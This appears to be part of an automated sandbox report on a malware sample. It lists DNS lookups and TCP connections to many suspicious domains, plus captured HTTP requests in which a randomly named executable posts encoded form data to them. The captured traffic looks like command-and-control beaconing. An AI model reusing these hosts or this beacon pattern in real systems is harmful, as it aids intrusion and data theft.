                                                                                  Oct 7, 2024 15:07:04.327199936 CEST5000580192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:04.850790024 CEST8050005209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:04.850878954 CEST5000580192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:04.866312981 CEST5000580192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:04.871613979 CEST8050005209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:04.871663094 CEST8050005209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:05.410839081 CEST8050005209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:05.411017895 CEST8050005209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:05.411170959 CEST5000580192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:06.369158030 CEST5000580192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:07.391721964 CEST5000680192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:07.397172928 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:07.403840065 CEST5000680192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:07.407721043 CEST5000680192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:07.412837982 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:08.196773052 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:08.196788073 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:08.196820021 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:08.197118044 CEST5000680192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:08.199718952 CEST5000680192.168.2.5209.74.64.190
                                                                                  Oct 7, 2024 15:07:08.204643965 CEST8050006209.74.64.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:13.263752937 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:13.269537926 CEST80500073.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:13.269947052 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:13.283814907 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:13.289014101 CEST80500073.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:14.633395910 CEST80500073.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:14.633450985 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:14.791105986 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.103472948 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.135380983 CEST80500073.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:15.135431051 CEST80500073.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:15.135481119 CEST5000780192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.809938908 CEST5000880192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.814810991 CEST80500083.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:15.819472075 CEST5000880192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.830452919 CEST5000880192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:15.835644960 CEST80500083.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:16.269212961 CEST80500083.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:16.269305944 CEST5000880192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:17.339411020 CEST5000880192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:17.344240904 CEST80500083.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:18.357568979 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:18.451443911 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:18.451564074 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:18.465363026 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:18.470422983 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:18.470820904 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:18.912570953 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:18.912684917 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:19.981847048 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:20.306718111 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:20.318206072 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:20.319489956 CEST80500093.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:20.319566011 CEST5000980192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:20.998758078 CEST5001080192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:21.003592968 CEST80500103.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:21.003671885 CEST5001080192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:21.012814999 CEST5001080192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:21.017586946 CEST80500103.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:21.443916082 CEST80500103.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:21.444200039 CEST80500103.33.130.190192.168.2.5
                                                                                  Oct 7, 2024 15:07:21.445278883 CEST5001080192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:21.447736025 CEST5001080192.168.2.53.33.130.190
                                                                                  Oct 7, 2024 15:07:21.452655077 CEST80500103.33.130.190192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 7, 2024 15:05:10.192600965 CEST5839153192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:05:10.280071974 CEST53583911.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:05:26.097403049 CEST5702553192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:05:26.408231020 CEST53570251.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:05:40.029314041 CEST5330453192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:05:40.048326969 CEST53533041.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:05:56.126158953 CEST5822753192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:05:56.169404984 CEST53582271.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:06:09.779413939 CEST5113153192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:06:09.792543888 CEST53511311.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:06:23.139360905 CEST5273753192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:06:23.160916090 CEST53527371.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:06:36.437899113 CEST5468453192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:06:37.250138998 CEST53546841.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:06:50.764563084 CEST5079753192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:06:50.774904013 CEST53507971.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:06:58.842607021 CEST6243053192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:06:59.225759029 CEST53624301.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:07:13.219393015 CEST6473953192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:07:13.259423971 CEST53647391.1.1.1192.168.2.5
                                                                                  Oct 7, 2024 15:07:26.935415983 CEST5306853192.168.2.51.1.1.1
                                                                                  Oct 7, 2024 15:07:26.954375029 CEST53530681.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 7, 2024 15:05:10.192600965 CEST192.168.2.51.1.1.10xe6c4Standard query (0)www.aed.shoppingA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:26.097403049 CEST192.168.2.51.1.1.10xd9e5Standard query (0)www.983743.vinA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:40.029314041 CEST192.168.2.51.1.1.10xd42Standard query (0)www.arcare.partnersA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:56.126158953 CEST192.168.2.51.1.1.10x314eStandard query (0)www.cctv9.restA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:09.779413939 CEST192.168.2.51.1.1.10xb0d3Standard query (0)www.07t90q.vipA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:23.139360905 CEST192.168.2.51.1.1.10xaccfStandard query (0)www.stratogent.infoA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:36.437899113 CEST192.168.2.51.1.1.10x9642Standard query (0)www.hpb5spjmad.buzzA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:50.764563084 CEST192.168.2.51.1.1.10x8aa2Standard query (0)www.diterra.shopA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:58.842607021 CEST192.168.2.51.1.1.10xde4eStandard query (0)www.dbold.topA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:13.219393015 CEST192.168.2.51.1.1.10x8618Standard query (0)www.yesonkoicasino.netA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:26.935415983 CEST192.168.2.51.1.1.10x6a90Standard query (0)www.cricketinsights.infoA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 7, 2024 15:05:10.280071974 CEST1.1.1.1192.168.2.50xe6c4No error (0)www.aed.shopping35.214.185.243A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:26.408231020 CEST1.1.1.1192.168.2.50xd9e5No error (0)www.983743.vin45.150.55.15A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:40.048326969 CEST1.1.1.1192.168.2.50xd42No error (0)www.arcare.partnersarcare.partnersCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:40.048326969 CEST1.1.1.1192.168.2.50xd42No error (0)arcare.partners3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:40.048326969 CEST1.1.1.1192.168.2.50xd42No error (0)arcare.partners15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:05:56.169404984 CEST1.1.1.1192.168.2.50x314eNo error (0)www.cctv9.rest114.134.188.182A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:09.792543888 CEST1.1.1.1192.168.2.50xb0d3No error (0)www.07t90q.vip07t90q.vipCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:09.792543888 CEST1.1.1.1192.168.2.50xb0d3No error (0)07t90q.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:09.792543888 CEST1.1.1.1192.168.2.50xb0d3No error (0)07t90q.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:23.160916090 CEST1.1.1.1192.168.2.50xaccfNo error (0)www.stratogent.infostratogent.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:23.160916090 CEST1.1.1.1192.168.2.50xaccfNo error (0)stratogent.info76.223.105.230A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:23.160916090 CEST1.1.1.1192.168.2.50xaccfNo error (0)stratogent.info13.248.243.5A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:37.250138998 CEST1.1.1.1192.168.2.50x9642No error (0)www.hpb5spjmad.buzz206.238.91.127A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:50.774904013 CEST1.1.1.1192.168.2.50x8aa2Name error (3)www.diterra.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:06:59.225759029 CEST1.1.1.1192.168.2.50xde4eNo error (0)www.dbold.top209.74.64.190A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:13.259423971 CEST1.1.1.1192.168.2.50x8618No error (0)www.yesonkoicasino.netyesonkoicasino.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:13.259423971 CEST1.1.1.1192.168.2.50x8618No error (0)yesonkoicasino.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:13.259423971 CEST1.1.1.1192.168.2.50x8618No error (0)yesonkoicasino.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:26.954375029 CEST1.1.1.1192.168.2.50x6a90No error (0)www.cricketinsights.infocricketinsights.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 7, 2024 15:07:26.954375029 CEST1.1.1.1192.168.2.50x6a90No error (0)cricketinsights.info118.139.176.2A (IP address)IN (0x0001)false
                                                                                  • www.aed.shopping
                                                                                  • www.983743.vin
                                                                                  • www.arcare.partners
                                                                                  • www.cctv9.rest
                                                                                  • www.07t90q.vip
                                                                                  • www.stratogent.info
                                                                                  • www.hpb5spjmad.buzz
                                                                                  • www.dbold.top
                                                                                  • www.yesonkoicasino.net
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.54988935.214.185.243801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:10.300071955 CEST547OUTGET /aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSs+NgVQDIMJFF9px4VCQZC+r8qI7xcKZuwQNqR19d0uyEXBGxed8FJi2lm9yYZ1OZE63+Pgn8NmZa2sjPIuJKsbkgLcIIc7eVTKhMDO8Pg==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.aed.shopping
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:05:11.041505098 CEST673INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:05:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Expires: Mon, 07 Oct 2024 14:05:10 GMT
                                                                                  Cache-Control: max-age=3600
                                                                                  X-Cache-Enabled: True
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://aed.shopping/aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSs+NgVQDIMJFF9px4VCQZC+r8qI7xcKZuwQNqR19d0uyEXBGxed8FJi2lm9yYZ1OZE63+Pgn8NmZa2sjPIuJKsbkgLcIIc7eVTKhMDO8Pg==&bTU8=BDEpwP48zFO0YTL
                                                                                  X-Httpd-Modphp: 1
                                                                                  Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                  X-Proxy-Cache: MISS
                                                                                  X-Proxy-Cache-Info: 0301 NC:000000 UP:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.54997645.150.55.15801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:26.425906897 CEST789OUTPOST /hi08/ HTTP/1.1
                                                                                  Host: www.983743.vin
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.983743.vin
                                                                                  Referer: http://www.983743.vin/hi08/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 7a 41 6d 4c 6b 72 41 35 63 6f 34 43 61 76 76 49 49 66 43 51 63 6c 57 53 68 57 6d 33 54 6d 34 49 54 44 48 61 37 31 6b 64 51 48 34 34 71 42 64 43 62 6a 6f 4f 7a 74 55 61 73 69 6e 2f 38 39 79 73 6f 5a 46 5a 6c 49 63 53 63 68 78 72 79 57 78 37 4c 37 78 4d 53 42 59 75 68 71 64 2f 61 48 4f 52 32 64 4a 68 33 65 53 47 34 64 59 51 46 2f 54 6b 61 52 4f 43 43 30 70 67 4e 78 48 44 73 4f 79 74 46 34 4d 51 4e 33 37 45 6e 78 33 73 67 74 32 62 51 68 2f 55 45 4f 6c 59 79 34 52 6e 4d 4d 77 6b 6b 7a 44 57 70 75 35 79 70 68 33 4c 39 44 64 39 51 49 45 6e 6a 52 4d 41 55 2b 53 5a 79 6a 72 32 54 6e 6d 71 54 2f 41 3d
                                                                                  Data Ascii: v2x4if=zAmLkrA5co4CavvIIfCQclWShWm3Tm4ITDHa71kdQH44qBdCbjoOztUasin/89ysoZFZlIcSchxryWx7L7xMSBYuhqd/aHOR2dJh3eSG4dYQF/TkaROCC0pgNxHDsOytF4MQN37Enx3sgt2bQh/UEOlYy4RnMMwkkzDWpu5yph3L9Dd9QIEnjRMAU+SZyjr2TnmqT/A=
                                                                                  Oct 7, 2024 15:05:27.273017883 CEST377INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:05:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.54997945.150.55.15801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:29.106839895 CEST809OUTPOST /hi08/ HTTP/1.1
                                                                                  Host: www.983743.vin
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.983743.vin
                                                                                  Referer: http://www.983743.vin/hi08/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 7a 41 6d 4c 6b 72 41 35 63 6f 34 43 63 2f 66 49 46 59 75 51 61 46 57 56 6b 57 6d 33 47 32 34 4d 54 44 37 61 37 77 55 4e 52 79 6f 34 71 67 74 43 55 43 6f 4f 2f 4e 55 61 6a 43 6e 2b 79 64 7a 67 6f 5a 59 6b 6c 4a 77 53 63 68 6c 72 79 54 31 37 4c 4d 6c 44 54 52 59 37 70 4b 64 39 65 48 4f 52 32 64 4a 68 33 65 57 73 34 64 41 51 46 76 6a 6b 62 30 69 44 64 45 70 6a 61 42 48 44 6d 65 79 78 46 34 4d 75 4e 32 6e 2b 6e 33 7a 73 67 70 79 62 55 6a 58 58 4e 4f 6c 61 38 59 51 56 50 4d 52 34 6b 69 4b 61 75 2b 38 55 78 43 37 2f 78 56 77 58 4b 71 4d 50 77 78 67 34 45 74 61 75 6a 54 4b 66 4a 45 32 61 4e 6f 55 6f 71 31 36 39 78 46 46 71 42 35 4a 54 66 42 31 71 63 2b 69 31
                                                                                  Data Ascii: v2x4if=zAmLkrA5co4Cc/fIFYuQaFWVkWm3G24MTD7a7wUNRyo4qgtCUCoO/NUajCn+ydzgoZYklJwSchlryT17LMlDTRY7pKd9eHOR2dJh3eWs4dAQFvjkb0iDdEpjaBHDmeyxF4MuN2n+n3zsgpybUjXXNOla8YQVPMR4kiKau+8UxC7/xVwXKqMPwxg4EtaujTKfJE2aNoUoq169xFFqB5JTfB1qc+i1
                                                                                  Oct 7, 2024 15:05:29.941720009 CEST377INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:05:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.54998045.150.55.15801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:31.660459042 CEST1826OUTPOST /hi08/ HTTP/1.1
                                                                                  Host: www.983743.vin
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.983743.vin
                                                                                  Referer: http://www.983743.vin/hi08/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 7a 41 6d 4c 6b 72 41 35 63 6f 34 43 63 2f 66 49 46 59 75 51 61 46 57 56 6b 57 6d 33 47 32 34 4d 54 44 37 61 37 77 55 4e 52 79 67 34 70 54 6c 43 56 68 41 4f 2b 4e 55 61 39 79 6e 46 79 64 7a 74 6f 5a 41 67 6c 49 4d 6b 63 69 64 72 7a 31 4a 37 4a 39 6c 44 5a 52 59 37 6c 71 64 2b 61 48 4f 41 32 64 59 6f 33 65 47 73 34 64 41 51 46 74 37 6b 66 68 4f 44 62 45 70 67 4e 78 48 66 73 4f 79 4e 46 38 70 57 4e 32 6a 75 6e 48 54 73 67 4e 57 62 53 47 4c 58 43 4f 6c 45 78 34 51 4e 50 4d 64 52 6b 69 48 72 75 39 68 7a 78 43 7a 2f 31 77 4e 36 56 5a 6f 76 74 69 6f 2b 49 63 48 4d 37 6c 43 7a 55 57 75 71 41 70 30 70 76 6b 71 42 6e 43 56 4b 43 4c 55 6f 63 6d 6c 53 52 49 2f 31 32 79 79 63 5a 4d 79 4b 33 51 6a 52 37 48 76 6e 48 68 41 63 32 61 53 69 6b 36 61 33 57 33 6f 64 78 59 6d 6a 53 78 79 7a 6e 43 4c 66 6e 31 66 34 56 78 2f 4c 31 72 56 50 61 6e 58 4c 6e 73 6d 4e 36 38 2f 5a 39 2f 47 48 55 6b 2b 6e 59 47 2b 38 49 4c 77 54 38 52 71 68 57 50 43 59 31 79 37 67 41 70 79 79 4a 72 66 57 72 4e 54 51 38 72 56 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=zAmLkrA5co4Cc/fIFYuQaFWVkWm3G24MTD7a7wUNRyg4pTlCVhAO+NUa9ynFydztoZAglIMkcidrz1J7J9lDZRY7lqd+aHOA2dYo3eGs4dAQFt7kfhODbEpgNxHfsOyNF8pWN2junHTsgNWbSGLXCOlEx4QNPMdRkiHru9hzxCz/1wN6VZovtio+IcHM7lCzUWuqAp0pvkqBnCVKCLUocmlSRI/12yycZMyK3QjR7HvnHhAc2aSik6a3W3odxYmjSxyznCLfn1f4Vx/L1rVPanXLnsmN68/Z9/GHUk+nYG+8ILwT8RqhWPCY1y7gApyyJrfWrNTQ8rVZtjV6RPBZPxIeJdPc5Xsd5Zg/eWgn8ZsBHXNULwHhHkA6HeFxZEiMupcUT19vhLA0JKACukJ+fJCplkIfLKLneKtuixfCD84fhk0i8hGNV92Q+YADv0oIxWF9YABM1A43AIk2DCbNkK2vatPaFyCYWVRdC2aXhK+4b5w7YvsiFcJDsE7+P96iM1nJ6VY48q2bCoVV2qoBEvminQEiNwWon5cSpZQ8s0dAIY9H/CgCZMHP47KLOVSIXvVbuANI7zQtB7sYs8CHzPhHigyZpgzu2kGl7duBXgBcyToM8q44MVfq+76qD6kZBQbm5A0kXSEsyimCIm4IO15zsvRCY1hu2EI6/TQ2jPPOwFfILB64rGzItdEt3Zl4cwhi8LZysZ29kAdMlYBGRHcpIIiOGUeuB6V3U1dBhRg/7WXE1/pnRUxcMW4EmQ443HJ9xPrIvS2niIyO345IL0/PPNGcN5fGUCBT8qo+NdTNSGGV0Zl6AB60WeHqTWpf/4BiwEGFgvmYJOziQIn9v/A8JNFtgo5P5zjsG5NqPCzDlADnHKd05CvDj7anZl+KGkZ4XKjLf9ytNs8kDPgbtHFHIhQc+P5NA7eXb94/T4No/tSGnaAcH66AVj7Tr4wngPNYpucVeWz2XC99bASUw9XNs5IatnuLnQmBCvAGkJkgQ [TRUNCATED]
                                                                                  Oct 7, 2024 15:05:32.492937088 CEST377INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:05:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
